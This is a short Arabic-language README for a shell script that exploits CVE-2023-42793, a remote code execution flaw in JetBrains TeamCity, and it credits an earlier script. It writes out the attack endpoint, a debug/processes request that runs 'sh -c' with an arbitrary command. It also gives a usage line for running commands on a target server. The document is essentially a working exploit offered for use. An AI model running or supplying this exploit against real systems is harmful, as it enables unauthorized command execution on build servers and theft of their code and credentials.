
teamcity-exploit-cve-2023-42793
نص برمجي سريع لاستغلال الثغرة cve-2023-42793. بعض القراءات الإضافية حول الاستغلال موجودة هنا:
https://www.cnblogs.com/LittleHann/p/17843271.html
يضيف هذا النص البرمجي القدرة على استخدام "params" بحرية لتنفيذ الأوامر بعد تشغيل ثغرة RCE:
RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh¶ms=-c¶ms=${URLCMD}"
الاستخدام: <base_url> <port> <command>
./TeamCity.sh blah.com 8111 "ls -lah"
النص البرمجي الأصلي هنا، كل التقدير يعود لهم: https://github.com/Zenmovie/CVE-2023-42793